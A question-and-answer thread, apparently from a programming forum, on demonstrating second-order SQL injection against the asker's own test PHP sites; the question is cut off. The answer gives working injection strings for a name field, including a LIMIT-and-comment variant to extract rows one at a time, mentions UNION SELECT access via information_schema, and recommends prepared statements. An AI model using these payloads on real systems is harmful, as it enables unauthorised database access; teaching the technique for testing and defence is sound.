How do I demonstrate a Second Order SQL Injection?

Question

So I\'ve been trying to replicate a second order SQL Injection. Here\'s an example template of two php based sites that I\'ve prepared. Let\'s just call it a voter registrat

Answer 1

Using a first name of:

' OR 1 OR '

This will produce a where clause in the second SQL of

WHERE FirstName = '' OR 1 OR ''

Therefore the result will be the first record in the table.

By adding a LIMIT clause, you can extract all rows from the table with:

' OR 1 ORDER BY UserID ASC LIMIT 0, 1 --

Obviously it will only extract 1 row at a time, so you would need to repeat that and increment the 0 in the LIMIT. This example uses a comment -- to terminate the remaining SQL which would otherwise cause the query to fail because it would add a single quote after your LIMIT.

The above is a simple example, a more complex attack would be to use a UNION SELECT which would give you access to the entire DB through the use of information_schema.

Also you are using addslashes() in one of your queries. That is not as secure as mysql_real_escape_string() and in turn: escaping quotes with either is not as secure as using prepared statements or parameterised queries for example in PDO or MySQLi.